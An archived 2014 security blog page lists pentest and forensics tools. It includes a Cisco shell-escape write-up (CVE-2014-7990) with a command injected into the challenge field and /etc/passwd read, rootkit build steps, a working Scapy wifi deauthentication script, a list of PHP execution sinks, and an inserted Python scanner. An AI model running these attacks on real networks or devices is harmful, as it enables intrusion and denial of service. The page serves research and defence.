Nov 15, 2014

Tools: Radare - Forensic Android Tool

The Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but it later gained support for analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, and more.
radare2 is portable.

Architectures:
6502, 8051, arm, arc, avr, bf, tms320 (c54x, c55x, c55+), gameboy, csr, dcpu16, dalvik, i8080, mips, m68k, msil, snes, nios II, sh, sparc, rar, powerpc, i386, x86-64, H8/300, malbolge, T8200
File Formats:
bios, dex, elf, elf64, filesystem, java, fatmach0, mach0, mach0-64, MZ, PE, PE+, TE, COFF, plan9, dyldcache, Gameboy and Nintendo DS ROMs
Operating Systems:
Android, GNU/Linux, [Net|Free|Open]BSD, iOS, OSX, QNX, w32, w64, Solaris, Haiku, FirefoxOS
Bindings:
Vala/Genie, Python (2, 3), NodeJS, LUA, Go, Perl, Guile, php5, newlisp, Ruby, Java, OCaml
  • Multi-architecture and multi-platform
    • GNU/Linux, Android, *BSD, OSX, iPhoneOS, Windows{32,64} and Solaris
    • i8080, 8051, x86{16,32,64}, avr, arc{4,compact}, arm{thumb,neon,aarch64}, c55x+, dalvik, ebc, gb, java, sparc, mips, nios2, powerpc, whitespace, brainfuck, malbolge, z80, psosvm, m68k, msil, sh, snes, gb, dcpu16, csr, arc
    • pe{32,64}, te, [fat]mach0{32,64}, elf{32,64}, bios/uefi, dex and java classes
  • Highly scriptable
    • Vala, Go, Python, Guile, Ruby, Perl, Lua, Java, JavaScript, sh, ..
    • batch mode and native plugins with full internal API access
    • native scripting based on mnemonic commands and macros
  • Hexadecimal editor
    • 64bit offset support with virtual addressing and section maps
    • Assemble and disassemble from/to many architectures
    • colorizes opcodes, bytes and debug register changes
    • print data in various formats (int, float, disasm, timestamp, ..)
    • search multiple patterns or keywords with binary mask support
    • checksumming and data analysis of byte blocks
  • IO is wrapped
    • supports files, disks, processes and streams
    • virtual addressing with sections and multiple file mapping
    • handles gdb:// and rap:// remote protocols
  • Filesystems support
    • allows mounting ext2, vfat, ntfs, and many others
    • supports partition types (gpt, msdos, ..)
  • Debugger support
    • gdb remote and brainfuck debugger support
    • software and hardware breakpoints
    • tracing and logging facilities
  • Diffing between two functions or binaries
  • Code analysis at opcode, basicblock, function levels
    • embedded simple virtual machine to emulate code
    • keep track of code and data references
    • function calls and syscall decompilation
    • function description, comments and library signatures

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: MeterSSH – Meterpreter over SSH

As penetration testers, we continually need to identify which types of attacks are detected and which are not. After a recent penetration test against a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature-based “next generation” product lines.
MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel, all self-contained in one single Python file. The Python file can easily be converted to an executable using pyinstaller or py2exe.



Nov 13, 2014

Tools: Simple-Rootkit - A simple attack against gcc and Python via kernel module, with highly detailed comments.

A simple attack via kernel module, with highly detailed comments.
Here we'll compile a kernel module which intercepts every "read" system call, searches for a string and replaces it if it looks like the gcc compiler or the python interpreter. This is meant to demonstrate how a compromised system can build a malicious binary from perfectly safe source code.
For more information see:
Also check out:


Install your kernel headers
sudo apt-get install linux-headers-$(uname -r)
Run make
cd simple-rootkit && make
Load the module
sudo insmod simple-rootkit.ko
Compile any C or run any Python script and all instances of the string "World!" will now read as Mrrrgn.
gcc hello.c -o hello


List of resources for MS14-066 (Schannel)



Tools: Nogotofail v0.4 Beta – TLS/SSL Testing Released

Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way. It includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, and more.



Tools: OWASP ASVS Assessment Tool (OWAAT)

OWASP ASVS Assessment Tool (OWAAT) is a tool used to verify a web application's security conformance to the OWASP Application Security Verification Standard (ASVS). It is licensed under AGPLv3.

OWAAT is a web-based tool and provides teamwork capabilities.
It allows creating multiple assessment projects and assigning assessment tasks to different users. The tool is written in PHP and JavaScript using the jQuery library.


  • User management: A team of analysts can easily collaborate in an application assessment process.
  • Verification methodology: It allows defining custom verification methods for each rule.
  • Project-based Assessment: Multiple assessment projects can be defined and managed.
  • Task Assignment: It allows assigning assessment tasks to each user.
  • Reporting: It enables creating reports from assessment results.

More Information:


Nov 11, 2014

Howto: Escape Cisco Catalyst 3650 authentication to get a Linux shell (CVE-2014-7990)

Alright then, let's go again. More, code execution before key verification. Nice.
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: b577ea00feb8c833d725a85c6c53e1839ab9[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
bash-3.2# uname -a
Linux localhost #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
bash-3.2# ls
BinOS       config     hugepages  lic0        rommon_to_env  sys     webui
RP_0_0_cli  crashinfo  include    lic1        root           tftp
auto        dev        install    lkern_init  sbin           tmp
bin         drec0      isan       misc        selinux        ucode0
bsn         epc        issu       mnt         share          usr
chasfs      etc        lib        obfl0       space          var
common      flash      lib32      proc        spi            vol
bash-3.2# whoami
bash-3.2# cat /etc/passwd
binos:x:85:85:binos administrative user:/usr/binos/conf:/usr/binos/conf/



Nov 10, 2014

Tool: Web Application Protection

WAP 2.0 is a source code static analysis and data mining tool that detects and corrects input validation vulnerabilities in web applications written in PHP (version 4.0 or higher), with a low rate of false positives. WAP detects and corrects the following vulnerabilities:
  • SQL Injection (SQLI)
  • Cross-site scripting (XSS)
  • Remote File Inclusion (RFI)
  • Local File Inclusion (LFI)
  • Directory Traversal or Path Traversal (DT/PT)
  • Source Code Disclosure (SCD)
  • OS Command Injection (OSCI)
  • PHP Code Injection


CheatSheet: Python By addedbytes



List of resources for the WireLurker malware on OSX



List of PHP Exploitation Code

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
`` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec     - Executes a program

PHP Code Execution

Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.
assert()  - identical to eval()
preg_replace('/.*/e',...) - /e does an eval() on the match
$func = new ReflectionFunction($_GET['func_name']); $func->invoke(); or $func->invokeArgs(array());

List of functions which accept callbacks

These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.
Function                     => Position of callback arguments
'ob_start'                   =>  0,
'array_diff_uassoc'          => -1,
'array_diff_ukey'            => -1,
'array_filter'               =>  1,
'array_intersect_uassoc'     => -1,
'array_intersect_ukey'       => -1,
'array_map'                  =>  0,
'array_reduce'               =>  1,
'array_udiff_assoc'          => -1,
'array_udiff_uassoc'         => array(-1, -2),
'array_udiff'                => -1,
'array_uintersect_assoc'     => -1,
'array_uintersect_uassoc'    => array(-1, -2),
'array_uintersect'           => -1,
'array_walk_recursive'       =>  1,
'array_walk'                 =>  1,
'assert_options'             =>  1,
'uasort'                     =>  1,
'uksort'                     =>  1,
'usort'                      =>  1,
'preg_replace_callback'      =>  1,
'spl_autoload_register'      =>  0,
'iterator_apply'             =>  1,
'call_user_func'             =>  0,
'call_user_func_array'       =>  0,
'register_shutdown_function' =>  0,
'register_tick_function'     =>  0,
'set_error_handler'          =>  0,
'set_exception_handler'      =>  0,
'session_set_save_handler'   => array(0, 1, 2, 3, 4, 5),
'sqlite_create_aggregate'    => array(2, 3),
'sqlite_create_function'     =>  2,
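As an added example (not code from the original post), a small Python scanner that applies the callback-position table and the command-execution list above to PHP source: it reports calls whose callback slot, or any argument of an execution sink, references a variable rather than a string literal or inline closure, and marks the ones that name a request superglobal directly. The PHP snippet inside is constructed, and the scan is purely syntactic (no data-flow tracking).

```python
import re

# Callback argument positions from the table above (negative = from the end); a subset.
CALLBACK_POS = {
    'ob_start': [0], 'array_filter': [1], 'array_map': [0], 'array_udiff_uassoc': [-1, -2],
    'array_walk': [1], 'usort': [1], 'uasort': [1], 'uksort': [1], 'preg_replace_callback': [1],
    'call_user_func': [0], 'register_shutdown_function': [0], 'set_error_handler': [0],
    'session_set_save_handler': [0, 1, 2, 3, 4, 5],
}
# Command- and code-execution sinks from the lists above: every argument is checked.
EXEC_SINKS = {'exec', 'passthru', 'system', 'shell_exec', 'popen', 'proc_open',
              'pcntl_exec', 'eval', 'assert'}
CALL = re.compile(r'\b([A-Za-z_]\w*)\s*\(')
USER_INPUT = re.compile(r'\$_(GET|POST|REQUEST|COOKIE|SERVER)\b')

def call_args(src, open_idx):
    # Top-level arguments of the call whose '(' is at src[open_idx], honouring
    # nested brackets and quoted strings; None if the call is never closed.
    args, cur, depth, quote, i = [], '', 0, None, open_idx
    while i < len(src):
        c = src[i]
        if quote:                        # inside a string literal; copy escapes whole
            cur += src[i:i + 2] if c == '\\' else c
            i += 2 if c == '\\' else 1
            quote = None if c == quote else quote
            continue
        if c in '\'"':
            quote, cur = c, cur + c
        elif c in '([{':
            depth += 1
            cur += c if depth > 1 else ''
        elif c in ')]}':
            depth -= 1
            if depth == 0:
                return [a for a in args + [cur.strip()] if a]
            cur += c
        elif c == ',' and depth == 1:    # separator at call level
            args, cur = args + [cur.strip()], ''
        else:
            cur += c
        i += 1
    return None

def scan_php(src):
    # Returns (line, function, argument, from_user_input) per risky call. A string
    # literal or inline closure in the slot is static; any '$' reference is reported.
    # Purely syntactic: "$cb = $_GET[...]" on an earlier line is not followed.
    findings = []
    for m in CALL.finditer(src):
        name = m.group(1)
        if name not in CALLBACK_POS and name not in EXEC_SINKS:
            continue
        args = call_args(src, m.end() - 1) or []
        positions = range(len(args)) if name in EXEC_SINKS else CALLBACK_POS[name]
        for pos in positions:
            arg = args[pos] if -len(args) <= pos < len(args) else ''
            if '$' in arg and not arg.startswith('function'):
                findings.append((src.count('\n', 0, m.start()) + 1, name, arg,
                                 bool(USER_INPUT.search(arg))))
    return findings

# Constructed sample, not real application code.
SAMPLE = """<?php $cb = $_GET['func'];
usort($items, $cb); array_map('strtoupper', $names);
system('ls -la ' . $_GET['dir']);
preg_replace_callback('/x/', function ($m) { return $m[0]; }, $s);
"""
```

Running scan_php(SAMPLE) reports the usort callback and the system argument but not the literal 'strtoupper' or the inline closure.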

Information Disclosure

Most of these function calls are not sinks in themselves; they become a vulnerability if any of the data they return is viewable to an attacker. If an attacker can see phpinfo() output, it is definitely a vulnerability.


extract - Opens the door for register_globals attacks (see "A Study in Scarlet").
parse_str - works like extract if only one argument is given.
mail - has CRLF injection in the 3rd parameter, which opens the door for spam.
header - on old systems CRLF injection could be used for XSS or other purposes; it is still a problem today if code does a header("Location: ..."); without a die();. The script keeps executing after a call to header() and still prints its output normally, which is nasty if you are trying to protect an administrative area.

Filesystem Functions

According to RATS, all filesystem functions in PHP are nasty. Some of them don't seem very useful to an attacker; others are more useful than you might think. For instance, if allow_url_fopen=On then a URL can be used as a file path, so a call to copy($_GET['s'], $_GET['d']); can be used to upload a PHP script anywhere on the system. Also, if a site is vulnerable to a request sent via GET, every one of these filesystem functions can be abused to channel an attack to another host through your server.
// open filesystem handler
// write to filesystem (partially in combination with reading)
imagepng   - 2nd parameter is a path.
imagewbmp  - 2nd parameter is a path. 
image2wbmp - 2nd parameter is a path. 
imagejpeg  - 2nd parameter is a path.
imagexbm   - 2nd parameter is a path.
imagegif   - 2nd parameter is a path.
imagegd    - 2nd parameter is a path.
imagegd2   - 2nd parameter is a path.



Tools: Differential Analysis of Malware in Memory(DAMM)

An open source memory analysis tool built on top of Volatility. It is meant as a proving ground for interesting new techniques to be made available to the community. These techniques are an attempt to speed up the investigation process through data reduction and codifying some expert knowledge.



Howto: Securely Delete the Trash (Recycle Bin) in Windows

Eraser is an easy to use program that allows you to delete files and folders securely while overwriting the files with carefully selected random data, rendering them useless. Eraser allows you to delete files on demand or schedule file deletion at a specified time in the future.
The program offers 13 different deleting techniques that will ensure that your deleted data is completely irrecoverable. The first method is Eraser’s default setting and the two DoD methods are the second and third most commonly used methods.
  1. Gutmann method 35-pass Method
  2. US DoD 5220.22-M standard 3-pass Method
  3. US DoD 5220.22-M standard 7-pass Method
1. Download Eraser

2. Set up Eraser

3. Simply double-click on the Eraser desktop icon and click on “Settings.” Change the erasure setting, and then press the “Save Settings” button

4. You can also erase files from the right-click context menu. Simply find a file you want to delete, then right-click on it. After that, select the Eraser context menu and choose whether you want to erase the file now or on the next computer restart.
You can also do the same thing with files in the recycle bin by following the same process described above.



Howto: Scapy Python Script for Wifideauth by @Catalyst256

#!/usr/bin/env python
# Scapy based wifi Deauth by @catalyst256
# Change the client to FF:FF:FF:FF:FF:FF if you want a broadcasted deauth to all stations on the targeted Access Point
import sys
if len(sys.argv) != 5:
    print('Usage is ./ interface bssid client count')
    print('Example - ./ mon0 00:11:22:33:44:55 55:44:33:22:11:00 50')
    sys.exit(1)  # stop here instead of running on with missing arguments
from scapy.all import *
conf.iface = sys.argv[1]  # The interface that you want to send packets out of, needs to be set to monitor mode
bssid = sys.argv[2]  # The BSSID of the Wireless Access Point you want to target
client = sys.argv[3]  # The MAC address of the Client you want to kick off the Access Point
count = sys.argv[4]  # The number of deauth packets you want to send
conf.verb = 0
# Management frame (type 0), subtype 12 = deauthentication, reason code 7
packet = RadioTap()/Dot11(type=0, subtype=12, addr1=client, addr2=bssid, addr3=bssid)/Dot11Deauth(reason=7)
for n in range(int(count)):
    sendp(packet)  # transmit one frame per iteration on conf.iface
    print('Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client)



Howto: Setup PHP Debugger with Sublime in Kali(Debian)

1. Install Sublime
# wget ""
# dpkg -i sublime-text_build-3065_amd64.deb

2. Run sublime
# cd /opt/sublime_text
# ./sublime_text

3. Install package control plugin. Open View -> Show Console
If you use Sublime 2
"import urllib2,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); os.makedirs( ipp ) if not os.path.exists(ipp) else None; urllib2.install_opener( urllib2.build_opener( urllib2.ProxyHandler()) ); by = urllib2.urlopen( '' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); open( os.path.join( ipp, pf), 'wb' ).write(by) if dh == h else None; print('Error validating download (got %s instead of %s), please try manual install' % (dh, h) if dh != h else 'Please restart Sublime Text to finish installation')"

If you use Sublime 3 (the version used in this post)
Paste this code and press Enter
"import urllib.request,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( '' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by) " 

4. Restart Sublime

5. Go to Preference -> Package Control to Install Package(Plugin)

6. Type xdebug and install it

7. Install LAMP (Linux + Apache2 + MySQL + PHP) and the required software
#  apt-get install apache2 php5 php5-gd mysql-server php5-mysql php5-dev php-pear make python

8. Install Xdebug module for PHP5
# apt-get install php5-xdebug

Configure the xdebug module in /etc/php5/conf.d/20-xdebug.ini and fill it with these options

9. Restart Apache2
# /etc/init.d/apache2 restart

9. Create example loop php file in sublime
    <?php
    $arr = array(1, 2, 3, 4);

    foreach ($arr as &$value) {
        $value = $value * 2;   // doubled in place through the reference
        print $value;          // a line to put a breakpoint on
    }

10. In Sublime, create some breakpoints with right-click and Xdebug -> Add/Remove Breakpoint.

11. In Sublime menu, Go to "Tools -> Xdebug -> Start Debugging"
(You can see the config of Sublime from "Tools -> Xdebug -> Settings Default(Or Settings User)")

12. Open Firefox

13. Install "The easiest Xdebug 2.0" addon

14. Restart Firefox

15. Go to "Tools -> Addon" and open the preferences of The easiest Xdebug 2.0

16. Input "sublime.xdebug" into IDE key for remote debugging.

17. Visit the page that we want to debug (the page from step 9). Click the bug icon on the right side

18. Refresh the page in the web browser; debugging begins and Sublime now controls the output of the page.


Tools: Heybe – Penetration Testing Automation Toolkit

Heybe is a Penetration Testing Automation Kit. It consists of modules that can be used to fully automate pen-tests and make them more effective. With Heybe you can 0wn all systems in a target company in a matter of minutes.
Heybe modules:
  • Fener: fast network discovery tool optimized for speed. Fener leverages several networking tools to discover all hosts within the target network.
  • Kevgir: automatic vulnerability scan tool. Kevgir is an automated vulnerability scanning tool optimized for speed. With Kevgir, an entire internal network can be scanned for specific vulnerabilities within minutes.
  • Sees: high precision social engineering tool. Sees is used for performing tailor-made social engineering campaigns with a high success ratio.
  • Kacak: automatic domain admin takeover tool. Kacak is developed to discover target Windows machines in the network and take over the entire Windows domain automatically.
  • Depdep: post exploitation tool. Depdep is a merciless sentinel which will seek sensitive files containing critical info leaking through your network.
  • Cilingir: remote password cracker. Cilingir is a tool used to automate the password / hash capturing and cracking process. Captured credentials are automatically sent to a remote password cracking server and cracked passwords are automatically stored in a local loot for usage during the pen-test.
  • Levye: brute force tool. Levye is used for automating the brute forcing process against common and not so common protocols like openvpn.


Tools: Hooker: Automated Dynamic Analysis of Android Applications

Hooker is an open-source project for dynamic analysis of Android applications. This project provides various tools and applications that can be used to automatically intercept and modify any API calls made by a targeted application. It leverages the Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...) in an elasticsearch database. A set of Python scripts can be used to automate the execution of an analysis in order to collect any API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:
  1. APK-instrumenter is an Android application that must be installed on an Android device (for instance, an emulator) prior to the analysis.
  2. hooker_xp is a Python tool that can be used to control the Android device and trigger the installation and stimulation of an application on it.
  3. hooker_analysis is a Python script that can be used to collect results stored in the elasticsearch database.
  4. tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact information.
  5. tools/apk_retriever is a Python tool that can be used to download APKs from various online public Android markets.
  6. tools/emulatorCreator is a script that can be used to prepare an emulator.


Tools: Ragpicker - Plugin for pre-analysis and reporting in Cuckoo

Ragpicker is a plugin-based malware crawler with pre-analysis and reporting functionalities. Use this tool if you are testing antivirus products or collecting malware for another analyzer/zoo.

